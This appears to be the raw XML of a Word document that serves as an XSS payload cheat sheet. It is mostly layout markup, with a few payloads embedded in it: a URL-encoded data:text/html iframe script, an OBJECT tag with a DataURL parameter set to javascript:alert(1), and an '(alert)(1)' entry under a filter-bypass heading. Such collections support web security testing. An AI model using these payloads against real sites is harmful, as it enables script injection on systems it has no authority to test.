                                  <a:pt x="8217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3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src="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data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;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8" o:spid="_x0000_s2262" style="width:411.9pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8238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">
                <v:shape id="Freeform 60" o:spid="_x0000_s2263" style="position:absolute;width:8238;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="823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WTkMEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdF/yH4QrumkkES4kZJShSLXTRmA+4ZK55&#10;mLkTMlMT/76zKHR5OO9sP5tePGh0rWUFSRSDIK6sbrlWUF5Pr+8gnEfW2FsmBU9ysN8tXjJMtZ34&#10;mx6Fr0UIYZeigsb7IZXSVQ0ZdJEdiAN3s6NBH+BYSz3iFMJNL9dx/CYNthwaGhzo0FB1L36Mgq47&#10;JpfPWieHj7y7THnp7+v+S6nVcs63IDzN/l/85z5rBZswNnwJP0D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Vk5DBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m8217,182l21,182r-3,l,161r,-3l,21,21,,8217,r21,21l8238,161r-18,21l8217,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8217,182;21,182;18,182;0,161;0,158;0,21;21,0;8217,0;8238,21;8238,161;8220,182;8217,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 59" o:spid="_x0000_s2264" type="#_x0000_t202" style="position:absolute;width:8238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my6s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my6sMAAADb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src="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data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;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1"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="470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525145" cy="116205"/>
                <wp:effectExtent l="6350" t="2540" r="1905" b="5080"/>
                <wp:docPr id="54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0" y="0"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="55" name="Freeform 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27" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 805 w 827"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 827"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 827"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 827"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 827"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 827"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 827"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 805 w 827"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 826 w 827"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 826 w 827"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 808 w 827"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 805 w 827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8" y="182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&lt;/iframe&gt;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" o:spid="_x0000_s2265" style="width:41.35pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 57" o:spid="_x0000_s2266" style="position:absolute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/GhMUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KEXopuFCwmugbTIu2hFzWIx0f2&#10;mYRk34bsNqb/vlsoeBxm5htmm46mFQP1rrasYDGPQBAXVtdcKsjPh9kahPPIGlvLpOCHHKS7ydMW&#10;E23vfKTh5EsRIOwSVFB53yVSuqIig25uO+Lg3Wxv0AfZl1L3eA9w08plFL1KgzWHhQo7equoaE7f&#10;RsFX9l7Gh8uHv8plHr801wx1cVTqeTruNyA8jf4R/m9/agWrFfx9CT9A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z8aExQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-18,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,182;21,182;18,182;0,161;0,158;0,21;21,0;805,0;826,21;826,161;808,182;805,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 56" o:spid="_x0000_s2267" type="#_x0000_t202" style="position:absolute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YmmMQA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGQkM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2JpjEAAAA2w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&lt;/iframe&gt;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr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5817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146685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="53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80 231"/>
                            <a:gd name="T3" fmla="*/ 280 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 280 231"/>
                            <a:gd name="T7" fmla="*/ 280 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 279 231"/>
                            <a:gd name="T11" fmla="*/ 279 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 259 231"/>
                            <a:gd name="T15" fmla="*/ 259 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 252 231"/>
                            <a:gd name="T19" fmla="*/ 252 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 231 231"/>
                            <a:gd name="T23" fmla="*/ 231 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 231 231"/>
                            <a:gd name="T27" fmla="*/ 231 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 256 231"/>
                            <a:gd name="T31" fmla="*/ 256 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 259 231"/>
                            <a:gd name="T35" fmla="*/ 259 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 280 231"/>
                            <a:gd name="T39" fmla="*/ 280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36EB4" id="Freeform 54" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:11.55pt;width:2.45pt;height:2.45pt;z-index:-1545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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,177800;13335,177800;11430,177165;0,164465;0,160020;13335,146685;17780,146685;31115,162560;31115,164465;17780,17780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5868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100965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4483100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="50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3100" cy="116205"/>
                          <a:chOff x="1930" y="159"/>
                          <a:chExt cx="7060" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="51" name="Freeform 53"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="158"/>
                            <a:ext cx="7060" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8968 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 7060"/>
                              <a:gd name="T2" fmla="+- 0 341 159"/>
                              <a:gd name="T3" fmla="*/ 341 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 7060"/>
                              <a:gd name="T6" fmla="+- 0 341 159"/>
                              <a:gd name="T7" fmla="*/ 341 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 7060"/>
                              <a:gd name="T10" fmla="+- 0 340 159"/>
                              <a:gd name="T11" fmla="*/ 340 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 7060"/>
                              <a:gd name="T14" fmla="+- 0 320 159"/>
                              <a:gd name="T15" fmla="*/ 320 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 7060"/>
                              <a:gd name="T18" fmla="+- 0 317 159"/>
                              <a:gd name="T19" fmla="*/ 317 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 7060"/>
                              <a:gd name="T22" fmla="+- 0 180 159"/>
                              <a:gd name="T23" fmla="*/ 180 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 7060"/>
                              <a:gd name="T26" fmla="+- 0 159 159"/>
                              <a:gd name="T27" fmla="*/ 159 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8968 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 7060"/>
                              <a:gd name="T30" fmla="+- 0 159 159"/>
                              <a:gd name="T31" fmla="*/ 159 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8989 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 7060"/>
                              <a:gd name="T34" fmla="+- 0 180 159"/>
                              <a:gd name="T35" fmla="*/ 180 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8989 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 7060"/>
                              <a:gd name="T38" fmla="+- 0 320 159"/>
                              <a:gd name="T39" fmla="*/ 320 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8971 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 7060"/>
                              <a:gd name="T42" fmla="+- 0 340 159"/>
                              <a:gd name="T43" fmla="*/ 340 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8968 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 7060"/>
                              <a:gd name="T46" fmla="+- 0 341 159"/>
                              <a:gd name="T47" fmla="*/ 341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060" h="183">
                                <a:moveTo>
                                  <a:pt x="7038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7038" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7059" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7059" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7041" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="70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58"/>
                            <a:ext cx="706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&lt;OBJECT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CLASS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ID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"&gt;&lt;PARAM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spacing w:val="8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NAME="DataURL"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" o:spid="_x0000_s2268" style="position:absolute;margin-left:96.5pt;margin-top:7.95pt;width:353pt;height:9.15pt;z-index:-15457792;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,159" coordsize="706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">
                <v:shape id="Freeform 53" o:spid="_x0000_s2269" style="position:absolute;left:1930;top:158;width:7060;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="706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+o78UA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP0UoDMRRE3wX/IVzBF2mzKyqyblq0UGgpUqz9gNvN&#10;3c1icrPdpG38eyMIPg4zc4ap58lZcaYx9J4VlNMCBHHjdc+dgv3ncvIMIkRkjdYzKfimAPPZ9VWN&#10;lfYX/qDzLnYiQzhUqMDEOFRShsaQwzD1A3H2Wj86jFmOndQjXjLcWXlfFE/SYc95weBAC0PN1+7k&#10;FPTLTTq9t/vysN6ajbVvx/Rwh0rd3qTXFxCRUvwP/7VXWsFjCb9f8g+Q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T6jvxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m7038,182l21,182r-3,-1l,161r,-3l,21,21,,7038,r21,21l7059,161r-18,20l7038,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7038,341;21,341;18,340;0,320;0,317;0,180;21,159;7038,159;7059,180;7059,320;7041,340;7038,341" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 52" o:spid="_x0000_s2270" type="#_x0000_t202" style="position:absolute;left:1930;top:158;width:706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0gm8MA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3nSjo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0gm8MAAADb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&lt;OBJECT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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CLASS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ID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"&gt;&lt;PARAM</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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NAME="DataURL"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8"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="470"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="-3"/>
          <w:sz w:val="18"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2021840" cy="116205"/>
                <wp:effectExtent l="6350" t="8890" r="635" b="8255"/>
                <wp:docPr id="47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1840" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3184" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="48" name="Freeform 5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84" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3162 w 3184"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 3184"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 3184"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 3184"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 3184"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 3184"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 3184"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 3162 w 3184"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 3183 w 3184"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 3183 w 3184"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 3165 w 3184"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 3162 w 3184"/>
                              <a:gd name="T23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3184" h="183">
                                <a:moveTo>
                                  <a:pt x="3162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3162" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3183" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3183" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3165" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="316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VALUE="javascript:alert(1)"&gt;&lt;/OBJECT&gt;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" o:spid="_x0000_s2271" style="width:159.2pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="3184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">
                <v:shape id="Freeform 50" o:spid="_x0000_s2272" style="position:absolute;width:3184;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3184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FnLMUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrCQBCG7wXfYRmhl1I3ShFJXaUKBb0otUrxNmTH&#10;JCQ7m2a3Sfr2zqHQ4/DP/803y/XgatVRG0rPBqaTBBRx5m3JuYHz5/vzAlSIyBZrz2TglwKsV6OH&#10;JabW9/xB3SnmSiAcUjRQxNikWoesIIdh4htiyW6+dRhlbHNtW+wF7mo9S5K5dliyXCiwoW1BWXX6&#10;caJhr0/Hm59+na/7Q/fd9dVlvqmMeRwPb6+gIg3xf/mvvbMGXkRWfhEA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0WcsxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3162,182l21,182r-3,l,161r,-3l,21,21,,3162,r21,21l3183,161r-18,21l3162,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3162,182;21,182;18,182;0,161;0,158;0,21;21,0;3162,0;3183,21;3183,161;3165,182;3162,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 49" o:spid="_x0000_s2273" type="#_x0000_t202" style="position:absolute;width:3184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kN8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AkN8MAAADb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VALUE="javascript:alert(1)"&gt;&lt;/OBJECT&gt;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43" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101"/>
      </w:pPr>
      <w:r>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11"/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5971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200025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="46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364 315"/>
                            <a:gd name="T3" fmla="*/ 364 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 364 315"/>
                            <a:gd name="T7" fmla="*/ 364 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 363 315"/>
                            <a:gd name="T11" fmla="*/ 363 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 343 315"/>
                            <a:gd name="T15" fmla="*/ 343 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 336 315"/>
                            <a:gd name="T19" fmla="*/ 336 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 315 315"/>
                            <a:gd name="T23" fmla="*/ 315 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 315 315"/>
                            <a:gd name="T27" fmla="*/ 315 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 339 315"/>
                            <a:gd name="T31" fmla="*/ 339 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 343 315"/>
                            <a:gd name="T35" fmla="*/ 343 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 364 315"/>
                            <a:gd name="T39" fmla="*/ 364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43242" id="Freeform 47" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:15.75pt;width:2.45pt;height:2.45pt;z-index:-15456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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,231140;13335,231140;11430,230505;0,217805;0,213360;13335,200025;17780,200025;31115,215265;31115,217805;17780,23114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6022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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="43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" cy="116205"/>
                          <a:chOff x="1930" y="242"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="44" name="Freeform 46"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="242"/>
                            <a:ext cx="912" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2820 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 912"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 424 242"/>
                              <a:gd name="T11" fmla="*/ 424 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 424 242"/>
                              <a:gd name="T43" fmla="*/ 424 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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2" h="183">
                                <a:moveTo>
                                  <a:pt x="890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90" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="894" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="89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242"/>
                            <a:ext cx="9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(alert)(1)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" o:spid="_x0000_s2274" style="position:absolute;margin-left:96.5pt;margin-top:12.1pt;width:45.6pt;height:9.15pt;z-index:-15456256;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,242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">
                <v:shape id="Freeform 46" o:spid="_x0000_s2275" style="position:absolute;left:1930;top:242;width:912;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="91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DKMsMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WoCMRSE7wu+QziCd5pVxNqtUaTUn4Ig1T7AYXPc&#10;LG5OdjdR17c3gtDLYWa+YWaL1pbiSo0vHCsYDhIQxJnTBecK/o6r/hSED8gaS8ek4E4eFvPO2wxT&#10;7W78S9dDyEWEsE9RgQmhSqX0mSGLfuAq4uidXGMxRNnkUjd4i3BbylGSTKTFguOCwYq+DGXnw8Uq&#10;qNf7gnjzPapr796P2c6Yn49WqV63XX6CCNSG//CrvdUKxmN4fo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ADKMsMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,424;21,424;18,424;0,403;0,400;0,263;21,242;890,242;912,263;912,403;894,424;890,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 45" o:spid="_x0000_s2276" type="#_x0000_t202" style="position:absolute;left:1930;top:242;width:91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uMs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LjLEAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJ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(alert)(1)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6073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423545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
